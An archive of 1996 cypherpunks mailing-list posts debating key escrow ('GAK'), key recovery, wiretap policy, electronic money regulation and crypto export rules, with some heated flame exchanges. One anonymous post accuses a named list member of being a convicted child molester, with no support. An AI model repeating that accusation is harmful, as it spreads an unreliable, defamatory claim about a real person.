Message-ID: <9609048444.AA844448332@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


"geeman@best.com" <geeman@best.com> wrote:
>(P)RNG's just aren't that likely to produce a key of 010101010.....
nor 001100110011... etc etc and I have been thinking about how one might
formalize and exploit this randomness property to increase the probability of
finding the key sooner.
...
>Any thoughts here?


Suppose we have a function f() that randomly chooses an integer between 1 and
100 such that each integer in the range is equally likely to be selected on each
call. If we call f() 6 times, each time noting whether the result is even or
odd, which of the following sequences is more likely?

Even Even Even Even Even Even

Even Odd Odd Even Even Odd

If you picked the second sequence as more likely, you are like most people who
responded to similar questions in a classic study of cognitive biases [1]. The
two sequences actually have an identical probability of occuring, and, in fact,
all sequences of six outcome are EQUALLY probable.

This example illustrates the representativeness bias, in which we mistakenly
suspect the global characteristics of a process to be represented locally in a
specific sequence[2].

Ciao,
James

1. Kahnman, D., and Tversky, A. Subjective probability: A judgement or
representativeness. Cognit. Psych. 3 (1972) 430-454

2. Stacy, Webb and MacMillian, Jean, Cognitive Bias in Software Development.
Communications of the ACM June 1995, 57-63






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott J. Schryvers" <schryver@radiks.net>
Date: Sat, 5 Oct 1996 05:25:55 +0800
To: cypherpunks@toad.com
Subject: Re: boycott GAKkers (was Re: NYT on IBM GAK)
Message-ID: <199610041507.KAA10250@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:39 PM 10/3/96 -0400, you wrote: GAKked DES!  Talk about redundant.

>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Thu, 3 Oct 1996, Adam Back wrote:
>
>> (I've seen HP, Sun, RSADSI, TIS, Apple, Atalla, DEC, Groupe Bull, IBM,
>> NCR Corp., and UPS mentioned).  Any confirmations?  Denials?
>
>IBM and TIS are definitely pro-GAK.  TIS is selling a firewall that uses
>GAKked DES.  IBM has been working on developing the "key recovery" technology.
>The article posted here a while ago that told of IBM's plans to support GAK
>also said that they were planning to license the technology to Sun and
>Netscape.  I don't know about the accuracy of that last statement.
>
>Mark
>- -- 
>PGP encrypted mail prefered.
>Key fingerprint = d61734f2800486ae6f79bfeb70f95348
>http://www.voicenet.com/~markm/
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.3
>Charset: noconv
>
>iQEVAwUBMlRcsCzIPc7jvyFpAQEiIwf/btvAiIVHF3alGh+Vivr3MoHnSSciFjGX
>qhqdS+SEsM4cTxE+y8vvfpHFs/faQPmWLgT70lyf1pJ+Avei7brieb/qWoC5q9MJ
>gBlSa1f2yVMY7ax+KPTwU+Yk63A7oi964d+ebCp51BLOtzKammRlIw/nBFuDMq/5
>ss2a4w4PuOEOP35WQIy0i8NBoJxEi5gHx5J/+gGzWK9iw/yZa0xyoT25ci6uh7mJ
>sPgNmedr/Pq+D5gk5GduGgGni/jrDeADH0K7R0M8Jqlh0Xc82NPkau8xwZAXDMJV
>947PF56souwrx3BHmj7fXPXIVBJEjWy/Ymv2N8LBm+BHS09CN0ns5Q==
>=URZJ
>-----END PGP SIGNATURE-----
>
>
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMlUoaf+hzPlzwZAdAQGopQgAvlREZb8S6SPQs/WQvZzkoR9ETJy1byEK
xGO/ymOpkivpGCZBXGcdOLnnDJbH26x8eh7iHi+Mzv6iVrbt11YkbZ9h7z7UTkdq
jtUMVN9MvOaKPxcLqTvcYgTOyKgLPYpIa27xKlP5Y7NqovacTHHA6TgSz5HjC8fQ
Jg+xCPDYsJTLEDmmdJVykJx/SU4ovIFP2o/8eF+LMIW7M3L7w5bHUO14HYkuMrUy
hpNp4NCycGbwia1GYkwfOYnx5YuQFSjBeubIm8sqC2Zs3A7B9OoTyOmec12JyvGz
G4kJe5vKhF+q8MktOSzazqMvdJ8PgQX0ecrhrurLVdVnwu1H1QB1ZQ==
=HViK
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Sat, 5 Oct 1996 05:56:54 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: The Myth of the "Balanced" Middle Ground (Was: Re: gack vs. key recovery)
Message-ID: <199610041759.KAA27421@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: "Vladimir Z. Nuri" <vznuri@netcom.com>
>
> ... I feel
> that cpunks are equally guilty, by branding anything that emanates
> out of the government as inherently orwellian.  do you always have
> to have an enemy?  is the government always going to be your 
> enemy, no matter what they do?

Actually, the government encourages this view by lying.  We can get
into the many examples on encryption and wire taps, but if the TLAs
keep using lies and PR instead of honesty and facts, then no one
will accept anything they propose as-is.  There will always be some
suspicion of hidden agendas.

And really, the agenda is obvious, but they have always refused to
acknowledge the full extent of it, probably because it would forever
damage their credibility.  At least right now, Freeh has done enough
PR (paid by your generous tax dollars) to make him look like a good
guy.  Janet Reno already looks innocent enough (hey, who could
criticize someone who might look like your grandmother?) ...  The PR
concepts are all there, deliberately or accidentally.

> I have posted here before that many companies find the concept
> of "key recovery" highly acceptable and even desirable.

Let them buy it.  There are companies already making products with
key recovery.  But remember that key recovery are mostly useful to
corporations, so it will be billed as the "professional" version (in
off-the-shelf PC-class software) and also be pushed through the IS
consulting channels.

None of that really addresses E-Mail, I-phone, etc for the rest of us.

> 2. those who feel that there is such a thing as a legal warrant
> or subpoena for information protected by cryptography keys, and
> would agree that this logically means that governments will be
> getting access to "key recovery" infrastructures.

I agree that there is a legitimate interest by legitimate law
enforcement and national security interests.  But ...

1.  If it's so darn easy to get non-GAK encryption, why dumb it down
    for the rest of us?  (Really, I just don't buy the "no plans for
    domestic regulations" bit.  Plenty of current and ex-executive
    branchies have admitted as much in private.)

2.  The Orwellian possibilities are definitely there.  I simply will
    not let the government have drift-net-fishing rights on the NII.
    Sorry.  I'll let them tap one-sie two-sie's, and I want the
    process to guarantee by functional design (not legal constraints)
    that it's expensive to tap more than a few at a time.

> personally I am leaning toward 2, because I feel that we already
> live in such a society, and that it is not orwellian.

That was true because it was too darn expensive.  Hey, at $50K per
tap, I would be really selective about spending my hard-lobbied wire
tap budget.  If I can just push a button, I will be far less
selective. (oh ... and make sure I ask real nicely later in front of
the judge ... maybe ... if I have time ... too busy catching
terrorists and child molesters, y'know)

I'm not as worried about the indiscriminant tapping ordered by "good"
FBI directors; I'm worried about the tapping by the bad ones.  There
is ZERO detectability if the FBI gets everything they want.  There is
not a chance of being accidentally discovered by a phone company
employee or a wandering by-stander.

That lack of check-and-balance is what I am completely against.  I
don't mind letting them have the technology if I can be sure it will
1) work and 2) minimize abuse.

> the recipe for 200+ years has always been
> and remains "eternal vigilance". in other words, I am in favor
> of some kind of mechanism by which the government can obtain
> keys via subpoenas/warrants.

Ok.  So every corporation (big and small) now must have a Chief
Law Enforcement Relations Officer (CLERO) if they build encryption
into their products?  Every software engineering consultant has to
jump through hoops to export their product?

Sorry.  If the software engineering industry were just big mammoth
corporations, I wouldn't care.  But it could just be me and my
home office.  I cannot afford to fly to D.C. to amuse some panel at
the D.o.C. with my stupid key-recovery tricks.  No.  This plan
completely discriminates against small players, and there are a lot
of them.

Finally, writing software is an art.  It is not purely art, but it
certainly is an art, which I believe falls fully under free
expression and the First Amendment.  The work of art is not
functional until someone compiles it and run it on a machine.  So
regulating anything before the actual execution is definitely a
violation of the First Amendment.

I don't have time to deal with privacy but as soon as it starts
executing, it becomes an instrument of privacy so regulating that
is also against my basic beliefs, not to mention my engineering
sense of practicality.

> those who continue to pursue (1) are going to be perceived as
> more and more radical and extremist, because arguably it is not
> even a system we have today or one that was ever devised.

Good point.  If we are not careful, we could get bad PR.  But then,
I've been trying to argue that use of words like "anarchy" is against
good PR principles anyway.  I don't think cypherpunks have such
pristine reputations that we must tread carefully for fear of
damaging our "reputation".

In fact, I don't think we even have one.  That is, in some ways,
worse than having one at all.

> regarding (2): the government may actually help bring crypto
> to the masses via the post office and other routes. are
> cpunks going to continue to hold the simplistic, reactionary,
> knee-jerk, black-and-white opinion that "anything with the
> word 'government' in it is evil"? "if the government is doing
> something, then we must sabotage it"?

I think you are making the obvious mistake that many people make
about similar groups, such as Libertarians.  When someone says you
should be able to freely choose, that is all that they are saying.
They are not saying that someone else may not make a system that is
not ideal, but does provide many other value-added benefits.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 5 Oct 1996 05:42:49 +0800
To: cypherpunks@toad.com
Subject: The attitude of US peoples toward govt  WAS: [AP stuff] (fwd)
Message-ID: <199610041616.LAA01460@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Jean-Francois Avon asked me to forward this to the list. It is part of 
a conversation that He and I had last week. 

The Crypto Relevance if any is in the attitudes we are discussing, and 
in the the last couple paragraphs of Mr. Avon's writing.

Forwarded message:
> From jf_avon@citenet.net Fri Sep 27 23:59:05 1996
> Message-Id: <9609280545.AB01676@cti02.citenet.net>
> Comments: Authenticated sender is <jf_avon@pop.citenet.net>
> From: "Jean-Francois Avon" <jf_avon@citenet.net>
> Organization: JFA Technologies, Montreal, QC, Canada
> To: snow <snow@smoke.suba.com>
> Date: Sat, 28 Sep 1996 01:45:30 -0500
> Subject: The attitude of US peoples toward govt  WAS: [AP stuff]
> Priority: normal
> X-Mailer: Pegasus Mail for Windows (v2.32)
> 
> On 27 Sep 96 at 20:01, snow wrote:
> > When I talked about driving for 48 hours straight, I was trying to
> > impart an idea that many midwestern people are rasied with, the
> > total VASTNESS of the world. We (midwesterners, and some of the
> > westerners, and a lot of older people (in their 60's & 70's)
> > honestly believe deep down inside that this country is too vast to
> > effectively control that the government simply CAN'T do it. They
> > can't enforce any control they wish to have with the army, because
> > WE have guns, and a lot of us are ex-army (a little older, a
> > little slower, a HELL of a lot more devious and a lot less
> > impetuious<sp>). We simply don't accept the fact that any one CAN
> > control us.
> 
> This might be why I liked NM, and AZ and TX.  I can understand the 
> feeling you describe as you can barely escape it while visiting the 
> place.  I suppose our canadian politicians also understood that: c.f. 
> Bill C-68 :(
> 
> > Anyway, [the person's] point was that [some type of software] took
> > control and decesions out of peoples hands, and that is why it was
> > a market sucess. This I see as a European disease, the looking to
> > government & the church for the solutions to every day problems.
> 
> That is the feudalist attitude and philosophy.  Absolutely
> disgusting.  Although we have, here in Quebec, french roots and
> civil laws based on the Napoleon Code (Common Law everywhere in
> Canada except in QC), the population have a very american way of
> seeing life. Every time I have political discussion with French from
> France, the feudal mentality always surfaces up and I always have
> problems with them.  They have a hierarchy-worshiping attitude,
> coupled with an abdication of the power of their own reason (at the
> individual level).  In short, they are brought-up to become yes-men. 
> It litterally gives me an uncomfortable feeling in my guts. 
> Disgusting.
> 
> > The original Colonists didn't have that attitude (well, they did to
> > some degree, but not the people on the edges) In fact the attitude
> > really didn't develop fully in this country until the 1920's, and
> > still hasn't caught on everywhere.
> 
> Roosevelt and his New Deal...  I got the chance to find a magazine
> who explained how the Federal Reserve was created.  Politicians
> sneaking into trains as "duck hunters", grand political socialistic
> schemes sprung on peoples in secret, etc.  The magazine did not say
> that but I am leaning on the Objectivist side and I tend to read
> what *is* written...
> 
> > politicians started paying for votes with government largess
> 
> As a 70 years old englishmen, ex-company managing president & very
> friend of mine once said: Everyday, they buy us with our own money...
> 
> > These two attitudes are pretty diametrically opposed, but coupled
> > it with a school system that doesn't encourage extra-curriculer
> > thought, and you have some pretty incosistent people. 
> 
> Unfortunately, you are absolutely right.
> 
> 
> [slight topic drift...] I was wondering lately...  Words have a lot
> of power.  They are the building blocks we use to materialize
> concepts.  Think about the word "Government".  You would think of it
> as a body that governs.  But the american peoples think the
> government ought to be a body that acts under a mandate to
> administrate and oversee certain things.  
> 
> The very word "govt" seems to (conceptually) almost "justify" the
> actions of present govts, while any other word (like, for example,
> "overseers", "Mandated", etc) would stress out that they are under 
> *our* orders (and nowadays, exceeding their mandate).
> 
> Maybe we should start using a new word to describe *exactly" what it
> is that they ought to be doing.  Doing so would also stress out 
> *exactly* what they are pulling on us...   
> 
> Comments?
> 
> jfa
> 
> Please e-mail me directly since I am not on cypherpunks anymore.  
> Thanks.
> Jean-Francois Avon, Pierrefonds (Montreal) QC Canada
>  DePompadour, Societe d'Importation Ltee
>     Finest Limoges porcelain and crystal
>  JFA Technologies, R&D consultants
>     physicists and engineers, LabView programing
> PGP keys at: http://w3.citenet.net/users/jf_avon
> ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
> ID# 5B51964D : 152ACCBCD4A481B0 254011193237822C 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Sat, 5 Oct 1996 06:12:59 +0800
To: Steve Schear <azur@netcom.com>
Subject: Re: The Right to Keep and Bear Crypto
In-Reply-To: <v02130500ae79cef28e84@[10.0.2.15]>
Message-ID: <Pine.SUN.3.95.961004110522.10345G-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


This will be my last post on this thread.

On Thu, 3 Oct 1996, Steve Schear wrote:
[...]
> 
> However, I found much disturbing.  The inference that the Exec branch could
> on the one hand classify crypto as a munition ('arms' by any other name),
> while for constitutional purposes the Courts may not exposes a deep-seated
> legal duplicity.
> 

Why is it "disturbing" that for administrative convenience a regulation
uses a shorthand term (in effect saying "treat crypto as if it was a
munition"), but that the courts say whatever convenient shorthand you use
for regulatory bookkeeping, it has no constitutional effect?

What would be the advantage of having the government simply re-impose the
ITAR word for word identically for all materials that are not arms in the
constitutional sense?  The ultimate result would be the same (since this is
arguably allowed by the statute, and the non-arms have *even less*
constitutional protection (unless they are speech).

> Constitutional interpretations over the past century not withstanding, it
> is clear (to me) that a substantial number of the Framers would abhor what
> has become of the Second Amendment's ... right to keep and bear arms.
> 

This is a different issue; it is irrelevant to the matter at hand since
crypto is not arms under ANY reading of the second amendment. 

As for your argument that the 2nd Am should be read expansively, rather
than narrowly, personally I doubt strongly that the Framers would have
been unanimous on this.  Recall that the Articles of Confederation were
abandoned in part due to Shay's rebellion -- and the (majority) 
Federalists (of whom the Jefferson you quote WAS NOT a part)  managed to
push through a strong centralizing government.  Recall that the
constitution in its first draft didn't even have a bill of rights!  I am
absolutely certain that the Framers recognized that things change over
time, and that they would have intended indeed did intend for us to
interpret the constitution with some degree -- but not too much --
flexibility.  As someone who believes in the importance of fidelity to
legal texts, I think we have a duty to make every word in the Constitution
count.  I therefore place weight on the fact that the 2nd amendment is
*unique* in giving the policy reason for the limitation on government
power ("a well-regulated militia" being essential &tc.).  This is ample
grounds to read the text as applying only in the context of an organized
militia -- not casual gun ownership -- **whether or not** this complies
with our best (and inevitably fallible) reconstruction of what certain
historical individuals may have thought the text meant, especially if the
historical evidence is mixed. [PS. Why do you privilege the authors of the
bill of rights over the people who voted for it?]

I might add that I personally find all discussions of plots to kill
people, or to watch gleefully while others seek to do so, so morally
repulsive that I now killfile everyone who takes part in them.  (This has
the interesting side-benefit of cutting the list down to very manageable
size.) This may explain why I do not respond to certain kinds of messages.

I should also add for the benefit of certain third parties to this debate
that I stopped responding to gun control flames three years ago after the
email flood attack by rabid pro-gun people that temporarily crashed my
account.

I do not mean by this to attempt to stifle any discussion, only to explain
why I'll concentrate on baby-tending and other work rather than go on in
this vein. 

**Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"**
                  **Age two weeks: 9 lbs 12 oz, 23"**
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 5 Oct 1996 06:50:52 +0800
To: cypherpunks@toad.com
Subject: MacGAK: Tim has a snit. Again.
In-Reply-To: <v03007801ae79f27cb8c3@[206.119.69.46]>
Message-ID: <v0300780bae7abd8ba3ee@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:20 pm -0400 10/3/96, Timothy C. May wrote:

> My comments here are not vitriolic, just factual. Clearly, while the
> "guerilla" crypto meeting was happening, the higher-ups were selling out
> their customers and going much further than they needed to in ensuring a
> Big Brother State.

Indeed. Welcome to the club, Tim.

I'm reminded of all those c'punk meetings at places like Sun, or SGI, or
any of several Bay Area landmark firms, all of whom have managements full
of people who think they're "doing the right thing" by helping the Feds spy
on us all. That's okay. Cypherpunks, some of them, anyway, write code. And
so, your point is?


> (BTW, in response to my "the surveillance system for the rest of us"
> comment, Andrew Loewenstern sent me a note in which he contrasted Apple's
> "1984" commercial with the current reality.)

Talking about people's private mail in the third person, Tim? It seems I'm
not the only one guilty of such stuff. At least I don't post names with the
opinions, though I shouldn't have posted anything in the first place. If
you remember, it is something which I apologized to the list for at the
time. It was late. I was tired. And, I might add, you were pissing on my
shoes. Fortunately, I wear my seaboots around here, given our past history
on this list.


> This is the epitome of armchair psychoananalysis. How can you _possibly_
> know what I thought about things? Jeez.

Nope. Can't tell what you think, Tim. Just an opinion. I'm just engaging in
a little constant conjunction; to take a leaf from Mr. Hume's book. That
is, however right he may be most of the time, Tim May seems to have an ego
the size of the Hindenburg, and he can be just about as inflamatory, when
he says he's been slighted. If you get in the way of that ego at all,
regardless of your facts, he will flame you to your shorts. Happens every
time. Impute causality however you want. The phenomena are clearly linked.

Must be what happens when you're holed up out in the woods all day with
nothing to keep you company but a mailing list.

> Who cares? Such comparisons are odious. I responded to Vinnie, not to the
> "us" implied in "we asked," and the matter would've remained between Vinnie
> and me had he not shared our e-mail with you and had you not then gone into
> one of your  "free association" rants. Recall that even Vinnie was highly
> critical of this performance.

Depends on what you call "highly". It seems that if you hadn't gone into a
towering snit, he probably wouldn't have said anything, because I was
right. And, my point still stands. You were behaving childishly. Both to
Vinnie then, to the list then, and to me and the list now.

By the way, "we", Vinnie and I, are the people who put MacCrypto together.
Admittedly, Vinnie did all the work, but it was ever thus. :-). You say, X
is important, we should do it, Vinnie says fine, let's do X, and Vinnie
makes it happen. I've never worked with anyone quite like that before. It's
very refreshing...


Frankly, Tim, you could have just let it pass, or at least have been more
of an adult about it, constitutionally impossible though that might be for
you. Inadvertantly, your churlishness probably increased the attendance at
the MacCrypto conference. So, thanks anyway. *I* certainly got lots of
positive comments about our interchange. ;-).


> Fuck off, to be blunt. You've got to learn to start making actual points,
> and not trying to show your writing chops from the Hunter S. Thompson
> Correspondence School of Creative Writing.

Ah. Tim, are you *jealous*? Of me? Aw, shucks...  And *your* mother wears
army boots, too.


However, in case you missed them, probably because the blood vessels in
your eyes were busy hemoraging, I *did* make several points. Allow me to
summarize again. They are:

1. Tim's lashing out at Apple because he feels slighted by not being
invited first to keynote the MacCrypto conference, though he was in fact
invited first, which makes it all mildly ironic, if not humorous.

2. Instead of Tim, Phil Zimmermann *did* speak at MacCrypto, which Phil
probably regrets, given the current Mac-GAK flap.

3. Apple's Ms. Hancock, whether or not she's "doing the right thing" by
helping the Feds spy on us all, or whether she just thinks corporate, but
not government, key "recovery" is, by itself, okay, has clearly stuck her
foot in her mouth, in the much same way that Mr. Barksdale(?) of Netscape
did last year. Unfortunately, Apple probably won't be as quick to react as
Netscape was, because, as an industrial corporation -- like Microsoft --
Apple may live *on* the net, but it is certainly certainly not *in* the
net, like Netscape, or you, or I am, Tim.

4. I expect that the people in the Macintosh Crypto community, and the Mac
internet community in general, will do their best to disabuse her of any
notions she may have in regard to GAK. It has already started to happen.

5. A lot of real good work was done at MacCrypto, which was a resounding
success, despite Tim's early efforts to piss all over it, which he seems to
be carrying forward to the present. No problem. That's what seaboots are
for.


> Fuck off. Back into my killfile you go.

Ah. A waste of a good summary. Oh, well. :-).

It's interesting to note that the only person who is supposed to be in your
killfile is Perry Metzger, even though you respond to him anyway,
especially when he says something which offends your vanity. So, such a
killfiling claim is probably dubious.  Since such luminaries as VZNuri, Dr.
Vulis, and Jim Bell are *not* in your killfile, evidenced by your
voluminous replies to them, your killfiling me can't be much of a threat,
on its face, or, for that matter, to my reputation here on cypherpunks,
even. ;-).

And, no, Tim, *I'm* not going to put you in my killfile, because *almost*
always, though it's becoming harder to see for all the fulminatory
theatrics, you're spot on.

I believe that, for some reason, I got off on the wrong foot with you from
my very first posting, more than two years ago last June. Your nasty crack
about the MacCrypto conference is just one of a series of personal
fusilades in what seems to be an ongoing pissfight. I bet you wouldn't have
given MacCrypto a passing thought, otherwise. The cost of doing business on
cypherpunks, I suppose. One gets used to it.

So, have a nice day, Tim, and don't forget your seaboots. It's getting wet
out here. Again.

Cheers,
Bob Hettinga





-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Fri, 4 Oct 1996 22:18:28 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: boycott GAKkers (was Re: NYT on IBM GAK)
In-Reply-To: <Pine.LNX.3.95.961003203339.1382B-100000@gak.voicenet.com>
Message-ID: <Pine.LNX.3.94.961004113015.158A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Oct 1996, Mark M. wrote:

> Date: Thu, 3 Oct 1996 20:39:58 -0400 (EDT)
> From: "Mark M." <markm@voicenet.com>
> To: cypherpunks@toad.com, Adam Back <aba@dcs.ex.ac.uk>
> Subject: Re: boycott GAKkers (was Re: NYT on IBM GAK)
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Thu, 3 Oct 1996, Adam Back wrote:
> 
> > (I've seen HP, Sun, RSADSI, TIS, Apple, Atalla, DEC, Groupe Bull, IBM,
> > NCR Corp., and UPS mentioned).  Any confirmations?  Denials?
> 
> IBM and TIS are definitely pro-GAK.  TIS is selling a firewall that uses
> GAKked DES.  IBM has been working on developing the "key recovery" technology.
> The article posted here a while ago that told of IBM's plans to support GAK
> also said that they were planning to license the technology to Sun and
> Netscape.  I don't know about the accuracy of that last statement.
> 
> Mark
> - -- 

So really, what it boils down to is that the masses (thats us) have o
crack DES before GAK is imposed.

 --Deviant
"The C Programming Language -- A language which combines the flexibility of
assembly language with the power of assembly language."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dustman@athensnet.com (Anonymous)
Date: Sat, 5 Oct 1996 05:14:01 +0800
To: cypherpunks@toad.com
Subject: [IMPORTANT] GAK
Message-ID: <199610041549.LAA26732@porky.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May is a convicted child molester.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Sat, 5 Oct 1996 15:31:29 +0800
To: cypherpunks@toad.com
Subject: Tietmeyer-Only banks should issue electronic money
Message-ID: <2.2.32.19961004155849.006ff404@206.33.128.129>
MIME-Version: 1.0
Content-Type: text/plain



I'm sure they'd like to have it "applied to Internet network money."....

			 
>	 FRANKFURT, Oct 3 (Reuter) - Bundesbank President Hans  
>Tietmeyer said on Thursday a new government policy to give only 
>banks the right to issue pre-paid cards, or ``electronic purses'', 
>should also be applied to Internet network money. 
>	 Tietmeyer said in the text of a speech to The Economic Club  
>of New York that G-10 central bank governors were addressing the 
>new payment forms because they may cause difficulties for 
>central banks to ensure the integrity of payments. 
>	 Tietmeyer noted European Union central bankers have agreed  
>that only banks should issue the pre-paid cards. The policy is 
>expected to be widened to include the rights to create and 
>maintain Internet-based electronic cash systems. 
>	 ``In our opinion, the same should definitely also apply to  
>network money,'' he said. 
>	 Tietmeyer said electronic forms of money tend to crowd out  
>currency and deposit money, which may increase the potential for 
>credit institutions to create money. 
>	 ``Electronic money may impair the supervisory functions of  
>the central bank, or, in other words, its function of ensuring 
>the integrity of payments,'' Tietmeyer said in a text of the 
>speech released in Frankfurt under embargo. 
>	 ``That would increase the risk of crises in one country  
>spreading out to engulf payment systems worldwide,'' he said. 
>	 Electronic purses are plastic cards with a built-in  
>micro-chip which stores the electronic cash value of an account 
>and can be reloaded at special machines. 
>	 The proposal to restrict such projects to banks is part of a  
>new German banking law which is still under preparation but 
>expected to be enforced in 1997. 
>	 Tietmeyer said it was difficult to create definitive  
>regulations for electronic money at ``this early stage''. 
>	 ``The evolution of electronic money is only in its infancy.  
>But it is a characteristic feature of today's world that 
>tomorrow's world will be upon us in no time,'' he said. 
>	 Electronic purses, also known as smart cards, are not yet  
>available in cash-dominated Germany but tests are being run on 
>several projects. 
>	 Internet banking is slowly gaining credence in Germany after  
>some of the top banks, including Dresdner Bank AG, launched 
>securities trading accounts via the Internet. 
_______________________
Regards,          He who foresees calamities suffers them twice over. -?
Joseph  Reagle    http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu    E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 5 Oct 1996 07:04:02 +0800
To: cypherpunks@toad.com
Subject: Re: Cybertax
Message-ID: <v03007817ae7ae5750491@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


MIME-Version: 1.0
Date:         Fri, 4 Oct 1996 10:17:00 -0500
Reply-To: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
Sender: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
From: Evelyn Brody <ebrody@KENTLAW.EDU>
Organization: Chicago-Kent College of Law
Subject:      Re: Cybertax
Comments: To: loukidej@tor.gpv.com
To: CYBERIA-L@LISTSERV.AOL.COM

The U.S. Treasury Department and other agencies are quite interested in
these issues.  In September, at a 2-day conference in Washington, DC, on
electronic money and banking, Internal Revenue Commissioner Margaret
Richardson described the concerns of tax commissioners world-wide about
digital currency.  Treasury will be issuing a White Paper in the next
month or two that will request comments from the public on a range of tax
and policy legal issues relating to electronic commerce.  These issues
will include, among others, permanent establishment, U.S. trade or
business, and compliance and enforcement.  See the news story in _Tax
Notes_ magazine, Sept. 23, 1996, at 1588, by Ryan Donmoyer, "Tax
Principles Must Be Applied to Wired Economy, Richardson Says."  (A
version of this story is also available electronically in LEXIS, Fedtax
Library, TNT file (as a new search).)      EB

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 5 Oct 1996 06:13:07 +0800
To: cypherpunks@toad.com
Subject: CNET Digital Dispatch  Vol. 2 No. 40
Message-ID: <3.0b16.32.19961004113328.00bb6fa0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


This was in the latest version of CNET's e-mail list.

Anyone want to add a few good sound bytes?


>
>7. "YOUR TURN": ARE ENCRYPTION LAWS TOO STRICT?
>
>The White House has finally loosened up the export restrictions on
>powerful encryption software:
>
>     http://www.news.com/News/Item/0%2C4%2C4003%2C00.html
>
>But the software industry and the Web community generally agree
>it's too little, too late.  How do you feel about the export of
>encryption technology? What about the government's continued
>insistence that law enforcement be availed of a method to decode
>any encrypted message if granted a court order?
>
>To contribute your opinion, phone CNET at 415/395-7805, enter
>extension 5400, and leave a message. We'll listen to the responses
>and broadcast some of the best on CNET Radio.
>
>Each week Digital Dispatch brings you the new "your turn"
>question, and each Wednesday you can hear the responses to the
>previous week's question on CNET Radio:
>
>     http://www.cnet.com/Content/Radio/

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pclow <pclow@pc.jaring.my>
Date: Fri, 4 Oct 1996 19:00:14 +0800
To: Chris Adams <adamsc@io-online.com>
Subject: Re: WINDOWS NT ????
In-Reply-To: <19961004024009156.AAA66@GIGANTE>
Message-ID: <32548D47.39CD@pc.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


Adamsc wrote:
> > is Windows NT secured system ?

NT? Secured? hahahahahahahahahahahahahahahahhahahahahahahaha




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John C. Randolph" <jcr@idiom.com>
Date: Sat, 5 Oct 1996 06:20:58 +0800
To: cypherpunks@toad.com
Subject: "Mormon Asshole?" re: GAK
Message-ID: <199610041936.MAA29441@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain


Attilla Says:

>but what inflames the anti-mormon passions the most is the 
>paid clergy of other organized religions whose employment is 
>the paid ministry to their flock.  Mormons threaten their jobs; 
>the mormons have no paid ministry; it is all part of our 
>"callings" to do the Lord's work.

Well, speaking as one who has occasionally been called anti-mormon
(although, I'm *really* not that specific!) The only time I feel
any anti-mormon "passion" is when I want to throttle one of your
missionaries.  I like sleeping in, and being awakened by a kid who
wants me to join a religion is really offensive.

If the LDS church would just give up this damnable proselytizing,
